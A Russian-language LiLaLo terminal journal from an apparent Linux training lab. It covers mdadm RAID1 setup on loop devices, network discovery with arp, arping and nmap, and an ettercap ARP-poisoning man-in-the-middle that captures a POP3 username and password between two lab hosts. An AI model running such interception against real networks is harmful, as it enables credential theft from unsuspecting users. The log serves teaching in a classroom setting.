Журнал лабораторных работ

Содержание

Журнал

Понедельник (06/01/09)

/dev/pts/10
10:17:02
#screen -x
/dev/pts/20
10:17:06
#screen -x
/dev/pts/14
10:17:06
#screen -x
/dev/pts/22
10:17:06
#!scre
[root@linux0:~]#
                 screen -ls
[root@linux0:~]#
There is a screen on:
        19538.pts-5.linux0      (01.06.2009 10:17:10)   (Attached)
1 Socket in /var/run/screen/S-root.
-------------------------------------------------------------------------------------------------
/dev/pts/0
10:17:07
#screen -ls
/dev/pts/6
10:17:08
#screen -x
/dev/pts/0
10:17:08
#screen -ls
/dev/pts/4
10:17:08
#screen
/dev/pts/0
10:17:09
#screen -ls
/dev/pts/2
10:17:09
#screen -x
/dev/pts/24
10:17:10
#screen -x
/dev/pts/27
10:17:12
#screen -ls
/dev/pts/29
10:17:12
#screen -x
/dev/pts/31
10:17:13
#screen -x
/dev/pts/0
10:17:13
#screen -x
/dev/pts/27
10:17:18
#apt-file search bin/mdadm
mdadm: /sbin/mdadm
mdadm: /sbin/mdadm-startall
/dev/pts/33
10:17:41
#screen -x
/dev/pts/27
10:17:44
#apt-get install mdadm
 │ начальную часть пути типа '/dev/', а просто вводить имена устройств, например 'md0 md1'    │
 │ или 'md/1 md/d0'.                                                                          │
 │                                                                                            │
 │ MD-массивы, необходимые для корневой файловой системы:                                     │
 │                                                                                            │
 │ all_______________________________________________________________________________________ │
 │                                                                                            │
 │                                           <Ok>                                             │
 │                                                                                            │
 └────────────────────────────────────────────────────────────────────────────────────────────┘
Выбор ранее не выбранного пакета mdadm.
(Чтение базы данных ... на данный момент установлено 23240 файлов и каталогов.)
Распаковывается пакет mdadm (из файла .../mdadm_2.6.9-3_i386.deb)...
Обрабатываются триггеры для man-db ...
Настраивается пакет mdadm (2.6.9-3) ...
Generating array device nodes... done.
Generating mdadm.conf... done.
Starting MD monitoring service: mdadm --monitor.
Assembling MD arrays...done (no arrays found in config file or automatically).
/dev/pts/35
10:20:04
#screen -x
/dev/pts/27
10:23:11
#rm harddisk.img

10:23:20
#df -h .
Файловая система      Разм  Исп  Дост  Исп% смонтирована на
rootfs                4,0G  1,8G  2,1G  47% /
10:23:23
#dd if=/dev/zero of=/disk1.img count=1 seek=200 bs=1024k
1+0 записей считано
1+0 записей написано
 скопировано 1048576 байт (1,0 MB), 0,001032 c, 1,0 GB/c
10:24:31
#ls -l /disk1.img
-rw-r--r-- 1 root root 210763776 Июн  1 10:24 /disk1.img
10:24:47
#dd if=/dev/zero of=/disk2.img count=1 seek=200 bs=1024k
1+0 записей считано
1+0 записей написано
 скопировано 1048576 байт (1,0 MB), 0,001007 c, 1,0 GB/c
10:26:26
#losetup /dev/loop1 /disk1.img
/dev/loop1: Нет такого файла или каталога
10:26:45
#modprobe loop

10:26:48
#losetup /dev/loop1 /disk1.img

10:26:49
#losetup /dev/loop2 /disk2.img

10:34:29
#mkisofs -JR -o /root/etc.iso /etc
I: -input-charset not specified, using utf-8 (detected in locale settings)
Using MOUNT000.SH;1 for  /etc/init.d/mountnfs-bootclean.sh (mountnfs.sh)
Using STOP_000.;1 for  /etc/init.d/stop-bootlogd-single (stop-bootlogd)
Using MOUNT001.SH;1 for  /etc/init.d/mountall.sh (mountall-bootclean.sh)
Using IFUPD000.;1 for  /etc/init.d/ifupdown (ifupdown-clean)
Using TRACE000.;1 for  /etc/alternatives/traceroute-nanog (traceroute6)
Using TRACE001.;1 for  /etc/alternatives/traceroute6 (traceroute)
Using VIEW_000.GZ;1 for  /etc/alternatives/view.pl.1.gz (view.pl.UTF-8.1.gz)
Using VIEW_001.GZ;1 for  /etc/alternatives/view.it.1.gz (view.it.ISO8859-1.1.gz)
Using TRACE000.GZ;1 for  /etc/alternatives/traceroute6.8.gz (traceroute.8.gz)
...
Using 30_EX005.;1 for  /etc/exim4/conf.d/transport/30_exim4-config_maildrop_pipe (30_exim4-config_address_file)
Using 30_EX006.;1 for  /etc/exim4/conf.d/transport/30_exim4-config_address_file (30_exim4-config_address_reply)
Using 30_EX007.;1 for  /etc/exim4/conf.d/transport/30_exim4-config_address_reply (30_exim4-config_procmail_pipe)
Using 30_EX000.;1 for  /etc/exim4/conf.d/acl/30_exim4-config_check_mail (30_exim4-config_check_rcpt)
Total translation table size: 0
Total rockridge attributes bytes: 139522
Total directory bytes: 351148
Path table size(bytes): 1594
Max brk space used c5000
1477 extents written (2 MB)
10:35:29
#apt-get install dvd+rw-tools
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Предлагаемые пакеты:
  cdrskin
НОВЫЕ пакеты, которые будут установлены:
  dvd+rw-tools
обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 17 пакетов не обновлено.
Необходимо скачать 162kБ архивов.
После данной операции, объём занятого дискового пространства возрастёт на 459kB.
Получено:1 http://10.0.35.1 sid/main dvd+rw-tools 7.1-4 [162kB]
Получено 162kБ за 0s (5653kБ/c)
Выбор ранее не выбранного пакета dvd+rw-tools.
(Чтение базы данных ... на данный момент установлено 23296 файлов и каталогов.)
Распаковывается пакет dvd+rw-tools (из файла .../dvd+rw-tools_7.1-4_i386.deb)...
Обрабатываются триггеры для man-db ...
Настраивается пакет dvd+rw-tools (7.1-4) ...
10:38:47
#ls /mnt
adduser.conf            default              issue           motd.tail      rsyslog.conf
adduser.conf.dpkg-save  defoma               issue.net       mtab           screenrc
adjtime                 deluser.conf         john            nanorc         scsi_id.config
aliases                 dhcp3                kbd             network        securetty
alternatives            dictionaries-common  ldap            networks       security
anacrontab              dpkg                 ld.so.cache     nsswitch.conf  service
apm                     emacs                ld.so.conf      openoffice     services
approx                  email-addresses      ld.so.conf.d    opt            sgml
apt                     environment          lilalo          pam.conf       shadow
at.deny                 exim4                locale.alias    pam.d          shadow-
...
console-cyrillic        host.conf            mail.rc         rc2.d          terminfo
cron.d                  hostname             manpath.config  rc3.d          timezone
cron.daily              hosts                mdadm           rc4.d          ts.conf
cron.hourly             hosts.allow          menu            rc5.d          ucf.conf
cron.monthly            hosts.deny           menu-methods    rc6.d          udev
crontab                 inetd.conf           mke2fs.conf     rc.local       vim
cron.weekly             init.d               modprobe.d      rcS.d          wgetrc
debconf.conf            inittab              modules         resolv.conf    X11
debian_version          inputrc              monit           rmt            xml
debsums-ignore          iproute2             motd            rpc
10:38:49
#mount -o loop /root/etc.iso /mnt

10:38:55
#umount /mnt

10:41:13
#ls -l /dev/loop2
brw-rw---- 1 root disk 7, 2 Июн  1 10:26 /dev/loop2
10:41:15
#mdadm
mdadm           mdadm-startall
10:41:15
#mdadm /dev/md0 -C -z 1 -n 2 /dev/loop2 /dev/loop1
mdadm: invalid size: 1
10:42:47
#mdadm
Usage: mdadm --help
  for help
10:42:48
#mdadm --help | less
10:42:59
#mdadm -C --help | less
10:43:29
##mdadm /dev/md0 -C -l 1 -n 2 /dev/loop2 /dev/loop1

10:43:36
#cat /proc/mdstat
Personalities : [raid1]
md0 : active raid1 loop1[1] loop2[0]
      205760 blocks [2/2] [UU]
      [=>...................]  resync =  6.9% (15232/205760) finish=1.0min speed=3046K/sec
unused devices: <none>
10:43:41
#mdadm --detail /dev/md0 | more
/dev/pts/8
10:46:34
#screen -x
/dev/pts/20
10:46:57
#screen -x
/dev/pts/27
10:53:55
#mdadm /dev/md0 -f /dev/loop1
mdadm: set /dev/loop1 faulty in /dev/md0
11:02:43
#cat /proc/mdstat
Personalities : [raid1]
md0 : active raid1 loop1[2](F) loop2[0]
      205760 blocks [2/1] [U_]
unused devices: <none>
11:02:54
#mdadm /dev/md0 -r /dev/loop1
mdadm: hot removed /dev/loop1
11:04:24
#mdadm /dev/md0 -a /dev/loop1
mdadm: re-added /dev/loop1
11:07:03
#losetup /dev/loop3 /disk3.img

11:07:19
#cat /proc/mdstat
Personalities : [raid1]
md0 : active raid1 loop3[2] loop2[0]
      205760 blocks [2/1] [U_]
      [==>..................]  recovery = 14.4% (30464/205760) finish=1.1min speed=2538K/sec
unused devices: <none>
11:08:19
#mdadm /dev/md0 -r /dev/loop3
mdadm: hot removed /dev/loop3
11:08:23
#mdadm /dev/md0 -a /dev/loop2
mdadm: Cannot open /dev/loop2: Device or resource busy
11:08:29
#mdadm /dev/md0 -a /dev/loop1
mdadm: re-added /dev/loop1
11:08:34
#mdadm /dev/md1 -C /dev/loop3 missing
mdadm: no raid-devices specified.
11:08:53
#mdadm /dev/md1 -C -n2 -l1 /dev/loop3 missing
mdadm: /dev/loop3 appears to be part of a raid array:
    level=raid1 devices=2 ctime=Mon Jun  1 10:43:36 2009
Continue creating array? y
mdadm: array /dev/md1 started.
11:10:26
#cat /proc/mdstat
Personalities : [raid1]
md1 : active raid1 loop4[2] loop3[0]
      205760 blocks [2/1] [U_]
      [=>...................]  recovery =  6.9% (15232/205760) finish=1.2min speed=2538K/sec
md0 : active raid1 loop1[1] loop2[0]
      205760 blocks [2/2] [UU]
unused devices: <none>
11:10:33
#cat /proc/mdstat
Personalities : [raid1]
md1 : active raid1 loop4[1] loop3[0]
      205760 blocks [2/2] [UU]
md0 : active raid1 loop1[1] loop2[0]
      205760 blocks [2/2] [UU]
unused devices: <none>
11:13:22
#mkfs.ext3 /dev/md1
mke2fs 1.41.5 (23-Apr-2009)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
51584 inodes, 205760 blocks
10288 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67371008
26 block groups
8192 blocks per group, 8192 fragments per group
1984 inodes per group
Superblock backups stored on blocks:
        8193, 24577, 40961, 57345, 73729, 204801
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 33 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
11:20:57
#man rsync
прошла 21 минута
/dev/pts/0
11:41:59
#screen -x
прошло 25 минут
/dev/pts/27
12:07:03
#arp -an
? (10.0.35.9) at 00:04:75:82:53:43 [ether] on eth0
? (10.0.35.1) at 00:16:3E:04:00:01 [ether] on eth0
? (10.0.35.22) at 00:15:60:7A:63:80 [ether] on eth0
/dev/pts/10
12:07:22
#ысscreen -x
       the differences. See the tech report for details.
       This would recursively transfer all files from the directory src/bar on the machine foo
       into the /data/tmp/bar directory on the local machine. The  files  are  transferred  in
              rsync -avz foo:src/bar /data/tmp
       “archive”  mode,  which  ensures that symbolic links, devices, attributes, permissions,
           ownerships, etc. are preserved in the transfer.  Additionally, compression will be used
       A  trailing  slash  on the source changes this behavior to avoid creating an additional
       directory level at the destination.  You can think of a trailing / on a source as mean‐
         ing  “copy  the contents of this directory” as opposed to “copy the directory by name”,
                 but in both cases the attributes of the containing directory  are  transferred  to  the
[root@linux0:~]# echo 2^32 | bc
4294967296
[root@linux0:~]# arp -an
? (10.0.35.9) at 00:04:75:82:53:43 [ether] on eth0
? (10.0.35.1) at 00:16:3E:04:00:01 [ether] on eth0
? (10.0.35.22) at 00:15:60:7A:63:80 [ether] on eth0
-------------------------------------------------------------------------------------------------
/dev/pts/20
12:07:35
#screen -x
прошло 11 минут
/dev/pts/37
12:19:13
#screen -x
/dev/pts/27
12:21:30
#ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:04:00:12
          inet addr:10.0.35.100  Bcast:10.255.255.255  Mask:255.0.0.0
          inet6 addr: fe80::216:3eff:fe04:12/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:868562 errors:0 dropped:0 overruns:0 frame:0
          TX packets:126493 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:78633561 (74.9 MiB)  TX bytes:27346510 (26.0 MiB)
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2685 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2685 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:48330 (47.1 KiB)  TX bytes:48330 (47.1 KiB)
12:24:42
#arping -c 1 192.168.16.2
ARPING 192.168.16.2
--- 192.168.16.2 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
12:24:52
#for i in {1..254}
> do
> arping -c 1 192.168.16.$i >& /dev/null && echo $i
> done
1
^C
^Z
[1]+  Stopped                 arping -c 1 192.168.16.$i >&/dev/null
12:25:10
#arp -an
? (10.0.35.1) at 00:16:3E:04:00:01 [ether] on eth0
? (10.0.35.22) at 00:15:60:7A:63:80 [ether] on eth0
12:25:41
#kill %1

12:25:44
#arp -an
? (192.168.15.254) at 00:15:60:7a:63:80 [ether] on eth0
? (192.168.15.3) at 00:07:e9:3c:2c:ba [ether] on eth0
12:26:06
#kill %1

12:26:29
#cat /tmp/arping.log
ARPING 192.168.16.1
60 bytes from 00:1f:29:bc:3a:d8 (192.168.16.1): index=0 time=220.060 usec
--- 192.168.16.1 statistics ---
1 packets transmitted, 1 packets received,   0% unanswered
ARPING 192.168.16.2
--- 192.168.16.2 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
ARPING 192.168.16.3
--- 192.168.16.3 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
...
1 packets transmitted, 0 packets received, 100% unanswered
ARPING 192.168.16.5
--- 192.168.16.5 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
ARPING 192.168.16.6
--- 192.168.16.6 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
ARPING 192.168.16.7
--- 192.168.16.7 statistics ---
1 packets transmitted, 0 packets received, 100% unanswered
12:26:32
#cat /tmp/arping.log | grep 192.168.16.1
ARPING 192.168.16.1
60 bytes from 00:1f:29:bc:3a:d8 (192.168.16.1): index=0 time=220.060 usec
--- 192.168.16.1 statistics ---
12:26:37
#cat /tmp/arping.log | grep '(192.168.16.1)' | awk '{print $4}'
00:1f:29:bc:3a:d8
12:28:20
#apt-get install tcpdump
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
НОВЫЕ пакеты, которые будут установлены:
  tcpdump
обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 25 пакетов не обновлено.
Необходимо скачать 325kБ архивов.
После данной операции, объём занятого дискового пространства возрастёт на 733kB.
Получено:1 http://10.0.35.1 sid/main tcpdump 4.0.0-2 [325kB]
Получено 325kБ за 0s (5730kБ/c)
Выбор ранее не выбранного пакета tcpdump.
(Чтение базы данных ... на данный момент установлено 54358 файлов и каталогов.)
Распаковывается пакет tcpdump (из файла .../tcpdump_4.0.0-2_i386.deb)...
Обрабатываются триггеры для man-db ...
Настраивается пакет tcpdump (4.0.0-2) ...
12:29:43
#ping 10.0.35.7
PING 10.0.35.7 (10.0.35.7) 56(84) bytes of data.
--- 10.0.35.7 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
12:30:29
#ping 10.0.35.9
PING 10.0.35.9 (10.0.35.9) 56(84) bytes of data.
64 bytes from 10.0.35.9: icmp_seq=1 ttl=64 time=0.218 ms
--- 10.0.35.9 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.218/0.218/0.218/0.000 ms
12:30:31
#arp -an
? (10.0.35.7) at <incomplete> on eth0
? (10.0.35.22) at 00:15:60:7A:63:80 [ether] on eth0
? (10.0.35.9) at 00:04:75:82:53:43 [ether] on eth0
? (10.0.35.1) at 00:16:3E:04:00:01 [ether] on eth0
12:33:11
#apt-get install ettercap
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Будут установлены следующие дополнительные пакеты:
  ettercap-common
НОВЫЕ пакеты, которые будут установлены:
  ettercap ettercap-common
обновлено 0, установлено 2 новых пакетов, для удаления отмечено 0 пакетов, и 25 пакетов не обновлено.
Необходимо скачать 500kБ архивов.
После данной операции, объём занятого дискового пространства возрастёт на 1593kB.
...
Получено:2 http://10.0.35.1 sid/main ettercap 1:0.7.3-1.2+b1 [191kB]
Получено 500kБ за 11s (43,7kБ/c)
Выбор ранее не выбранного пакета ettercap-common.
(Чтение базы данных ... на данный момент установлено 54370 файлов и каталогов.)
Распаковывается пакет ettercap-common (из файла .../ettercap-common_1%3a0.7.3-1.2+b1_i386.deb)...
Выбор ранее не выбранного пакета ettercap.
Распаковывается пакет ettercap (из файла .../ettercap_1%3a0.7.3-1.2+b1_i386.deb)...
Обрабатываются триггеры для man-db ...
Настраивается пакет ettercap-common (1:0.7.3-1.2+b1) ...
Настраивается пакет ettercap (1:0.7.3-1.2+b1) ...
12:37:36
#apt-get install qpopper
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
НОВЫЕ пакеты, которые будут установлены:
  qpopper
обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 25 пакетов не обновлено.
Необходимо скачать 414kБ архивов.
После данной операции, объём занятого дискового пространства возрастёт на 647kB.
Получено:1 http://10.0.35.1 sid/main qpopper 4.0.9.dfsg-1 [414kB]
Получено 414kБ за 0s (7045kБ/c)
Выбор ранее не выбранного пакета qpopper.
(Чтение базы данных ... на данный момент установлено 54476 файлов и каталогов.)
Распаковывается пакет qpopper (из файла .../qpopper_4.0.9.dfsg-1_i386.deb)...
Обрабатываются триггеры для man-db ...
Настраивается пакет qpopper (4.0.9.dfsg-1) ...
12:38:27
#tail /etc/inetd.conf
#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
#:RPC: RPC based services
#:HAM-RADIO: amateur-radio services
#:OTHER: Other services
9999            stream  tcp     nowait  approx  /usr/sbin/approx
12:38:32
#ssh 192.168.15.253
The authenticity of host '192.168.15.253 (192.168.15.253)' can't be established.
RSA key fingerprint is 23:4b:a2:99:88:79:fc:35:b7:62:e8:6b:0d:d0:e1:4b.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.
12:38:37
#less /etc/inetd.conf
12:38:45
#ssh 192.168.15.1
root@192.168.15.1's password:
Linux linux1 2.6.29-2-686 #1 SMP Sun May 17 17:56:29 UTC 2009 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May 30 19:23:26 2009 from 192.168.15.253
12:38:45
#/etc/init.d/openbsd-inetd restart
Restarting internet superserver: inetd.
12:38:51
#netstat -lnp | grep :110
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      14803/inetd
12:39:46
#(echo USER user; echo PASS password ) | nc 127.0.0.1 110
+OK Qpopper (version 4.0.9) at linux1.unix.nt starting.  <14832.1243849228@linux1.unix.nt>
+OK Password required for user.
+OK user has 0 visible messages (0 hidden) in 0 octets.
^C
12:42:02
#exit
exit
Connection to 192.168.15.1 closed.
12:42:10
#apt-get install ettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  portmap
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
  ettercap-common
The following NEW packages will be installed:
  ettercap ettercap-common
...
Get:2 http://127.0.0.1 sid/main ettercap 1:0.7.3-1.2+b1 [191kB]
Fetched 500kB in 0s (2383kB/s)
Selecting previously deselected package ettercap-common.
(Reading database ... 55386 files and directories currently installed.)
Unpacking ettercap-common (from .../ettercap-common_1%3a0.7.3-1.2+b1_i386.deb) ...
Selecting previously deselected package ettercap.
Unpacking ettercap (from .../ettercap_1%3a0.7.3-1.2+b1_i386.deb) ...
Processing triggers for man-db ...
Setting up ettercap-common (1:0.7.3-1.2+b1) ...
Setting up ettercap (1:0.7.3-1.2+b1) ...
12:42:21
#ettercap -M arp /192.168.15.4/ /192.168.15.1/ -L log -T
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
  eth0 ->       00:07:E9:3C:2C:BA      192.168.15.3     255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
...
TCP  192.168.15.4:40653 --> 192.168.15.1:110 | AP
PASS pasword
POP : 192.168.15.1:110 -> USER: user
  PASS: pasword
Mon Jun  1 12:43:33 2009
TCP  192.168.15.1:110 --> 192.168.15.4:40653 | A
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
12:43:43
#etterlog -L log.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version    : NG-0.7.3
Timestamp           : Mon Jun  1 12:42:47 2009
Type                : LOG_INFO
1698 tcp OS fingerprint
7587 mac vendor fingerprint
2183 known services
12:43:50
#etterlog -L log.ecp
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version    : NG-0.7.3
Timestamp           : Mon Jun  1 12:42:47 2009
Type                : LOG_PACKET
Mon Jun  1 12:42:58 2009 [700304]
TCP  192.168.15.4:40653 --> 192.168.15.1:110 | S
Mon Jun  1 12:42:58 2009 [700596]
TCP  192.168.15.1:110 --> 192.168.15.4:40653 | SA
Mon Jun  1 12:42:58 2009 [704286]
TCP  192.168.15.4:40653 --> 192.168.15.1:110 | A
...
Mon Jun  1 12:43:22 2009 [946481]
TCP  192.168.15.1:110 --> 192.168.15.4:40653 | AP
+OK Password required for user..
Mon Jun  1 12:43:22 2009 [946771]
TCP  192.168.15.4:40653 --> 192.168.15.1:110 | A
Mon Jun  1 12:43:33 2009 [704304]
TCP  192.168.15.4:40653 --> 192.168.15.1:110 | AP
PASS pasword
Mon Jun  1 12:43:33 2009 [743632]
TCP  192.168.15.1:110 --> 192.168.15.4:40653 | A
12:43:53
#etterlog -L log.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version    : NG-0.7.3
Timestamp           : Mon Jun  1 12:42:47 2009
Type                : LOG_INFO
1698 tcp OS fingerprint
7587 mac vendor fingerprint
2183 known services
12:51:24
#apt-get install nmap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  portmap
Use 'apt-get autoremove' to remove them.
The following NEW packages will be installed:
  nmap
0 upgraded, 1 newly installed, 0 to remove and 20 not upgraded.
Need to get 1072kB of archives.
After this operation, 3801kB of additional disk space will be used.
Get:1 http://127.0.0.1 sid/main nmap 4.68-1 [1072kB]
Fetched 1072kB in 0s (3242kB/s)
Selecting previously deselected package nmap.
(Reading database ... 55492 files and directories currently installed.)
Unpacking nmap (from .../archives/nmap_4.68-1_i386.deb) ...
Processing triggers for man-db ...
Setting up nmap (4.68-1) ...
12:51:40
#nmap -p 22 '192.168.15.*' >& /dev/null

12:52:18
#arp -am
arp: invalid option -- 'm'
Usage:
  arp [-vn]  [<HW>] [-i <if>] [-a] [<hostname>]             <-Display ARP cache
  arp [-v]          [-i <if>] -d  <host> [pub]               <-Delete ARP entry
  arp [-vnD] [<HW>] [-i <if>] -f  [<filename>]            <-Add entry from file
  arp [-v]   [<HW>] [-i <if>] -s  <host> <hwaddr> [temp]            <-Add entry
  arp [-v]   [<HW>] [-i <if>] -Ds <host> <if> [netmask <nm>] pub          <-''-
        -a                       display (all) hosts in alternative (BSD) style
        -s, --set                set a new ARP entry
        -d, --delete             delete a specified entry
...
        -D, --use-device         read <hwaddr> from given device
        -A, -p, --protocol       specify protocol family
        -f, --file               read new entries from file or from /etc/ethers
  <HW>=Use '-H <hw>' to specify hardware address type. Default: ether
  List of possible hardware types (which support ARP):
    strip (Metricom Starmode IP) ash (Ash) ether (Ethernet)
    tr (16/4 Mbps Token Ring) tr (16/4 Mbps Token Ring (New)) ax25 (AMPR AX.25)
    netrom (AMPR NET/ROM) rose (AMPR ROSE) arcnet (ARCnet)
    dlci (Frame Relay DLCI) fddi (Fiber Distributed Data Interface) hippi (HIPPI)
    irda (IrLAP) x25 (generic X.25) eui64 (Generic EUI-64)
12:52:23
#arp -an
? (192.168.15.16) at 00:04:76:a1:f0:5d [ether] on eth0
? (192.168.15.254) at 00:15:60:7a:63:80 [ether] on eth0
? (192.168.15.5) at 00:0a:01:d4:d3:5a [ether] on eth0
? (192.168.15.15) at 00:22:15:c8:4e:d2 [ether] on eth0
? (192.168.15.9) at 00:1e:8c:64:2c:4a [ether] on eth0
? (192.168.15.1) at 00:1b:fc:7d:bb:47 [ether] on eth0
? (192.168.15.7) at 00:1b:fc:7d:b5:98 [ether] on eth0
? (192.168.15.12) at 00:1b:fc:7d:bc:f0 [ether] on eth0
? (192.168.15.11) at 00:1b:fc:7d:bc:f5 [ether] on eth0
? (192.168.15.14) at 00:1b:fc:7d:bd:0e [ether] on eth0
? (192.168.15.10) at 00:13:d4:b2:4f:e0 [ether] on eth0
? (192.168.15.6) at 00:1b:fc:7d:b5:a7 [ether] on eth0
? (192.168.15.253) at 00:1f:29:bc:3a:d8 [ether] on eth0
? (192.168.15.8) at 00:1e:8c:64:2a:66 [ether] on eth0
? (192.168.15.4) at 00:04:76:a0:a9:12 [ether] on eth0
? (192.168.15.13) at 00:1b:fc:c1:52:e8 [ether] on eth0
? (192.168.15.2) at 00:1e:8c:64:2a:64 [ether] on eth0
12:52:24
#arp -an | awk '{print $2" "$4}' | tr -d '()'
192.168.15.16 00:04:76:a1:f0:5d
192.168.15.254 00:15:60:7a:63:80
192.168.15.5 00:0a:01:d4:d3:5a
192.168.15.15 00:22:15:c8:4e:d2
192.168.15.9 00:1e:8c:64:2c:4a
192.168.15.1 00:1b:fc:7d:bb:47
192.168.15.7 00:1b:fc:7d:b5:98
192.168.15.12 00:1b:fc:7d:bc:f0
192.168.15.11 00:1b:fc:7d:bc:f5
192.168.15.14 00:1b:fc:7d:bd:0e
192.168.15.10 00:13:d4:b2:4f:e0
192.168.15.6 00:1b:fc:7d:b5:a7
192.168.15.253 00:1f:29:bc:3a:d8
192.168.15.8 00:1e:8c:64:2a:66
192.168.15.4 00:04:76:a0:a9:12
192.168.15.13 00:1b:fc:c1:52:e8
192.168.15.2 00:1e:8c:64:2a:64
12:56:12
#ssh 192.168.15.3
root@192.168.15.3's password:
Linux linux4 2.6.29-2-686 #1 SMP Sun May 17 17:56:29 UTC 2009 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 29 18:51:05 2009
l3-agent is already running: pid=3589; pidfile=/root/.lilalo/l3-agent.pid
прошло 96 минут
14:32:51
#ssh 192.168.15.3

прошло 10 минут
/dev/pts/0
14:43:15
#screen -x

Файлы

  • /proc/mdstat
  • /tmp/arping.log
  • /proc/mdstat
    >
    Personalities : [raid1]
    md1 : active raid1 loop4[1] loop3[0]
          205760 blocks [2/2] [UU]
    md0 : active raid1 loop1[1] loop2[0]
          205760 blocks [2/2] [UU]
    unused devices: <none>
    
    /tmp/arping.log
    >
    ARPING 192.168.16.1
    60 bytes from 00:1f:29:bc:3a:d8 (192.168.16.1): index=0 time=220.060 usec
    --- 192.168.16.1 statistics ---
    1 packets transmitted, 1 packets received,   0% unanswered
    ARPING 192.168.16.2
    --- 192.168.16.2 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    ARPING 192.168.16.3
    --- 192.168.16.3 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    ARPING 192.168.16.4
    --- 192.168.16.4 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    ARPING 192.168.16.5
    --- 192.168.16.5 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    ARPING 192.168.16.6
    --- 192.168.16.6 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    ARPING 192.168.16.7
    --- 192.168.16.7 statistics ---
    1 packets transmitted, 0 packets received, 100% unanswered
    

    Статистика

    Время первой команды журнала10:17:02 2009- 6- 1
    Время последней команды журнала14:43:15 2009- 6- 1
    Количество командных строк в журнале101
    Процент команд с ненулевым кодом завершения, %14.85
    Процент синтаксически неверно набранных команд, % 0.00
    Суммарное время работы с терминалом *, час 2.83
    Количество командных строк в единицу времени, команда/мин 0.60
    Частота использования команд
    screen22|===================| 19.30%
    mdadm14|============| 12.28%
    cat8|=======| 7.02%
    apt-get7|======| 6.14%
    arp7|======| 6.14%
    losetup4|===| 3.51%
    ssh4|===| 3.51%
    etterlog3|==| 2.63%
    ls3|==| 2.63%
    less3|==| 2.63%
    grep3|==| 2.63%
    awk2|=| 1.75%
    ping2|=| 1.75%
    dd2|=| 1.75%
    kill2|=| 1.75%
    ifconfig1|| 0.88%
    more1|| 0.88%
    &1|| 0.88%
    /etc/init.d/openbsd-inetd1|| 0.88%
    umount1|| 0.88%
    man1|| 0.88%
    arping1|| 0.88%
    mkfs.ext31|| 0.88%
    rm1|| 0.88%
    nmap1|| 0.88%
    echo1|| 0.88%
    netstat1|| 0.88%
    #mdadm1|| 0.88%
    ettercap1|| 0.88%
    !scre1|| 0.88%
    (echo1|| 0.88%
    null1|| 0.88%
    mount1|| 0.88%
    for1|| 0.88%
    nc1|| 0.88%
    apt-file1|| 0.88%
    tail1|| 0.88%
    modprobe1|| 0.88%
    df1|| 0.88%
    ысscreen1|| 0.88%
    exit1|| 0.88%
    mkisofs1|| 0.88%
    tr1|| 0.88%
    ____
    *) Интервалы неактивности длительностью 30 минут и более не учитываются

    Справка

    Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:
    1. В журнал автоматически попадают все команды, данные в любом терминале системы.

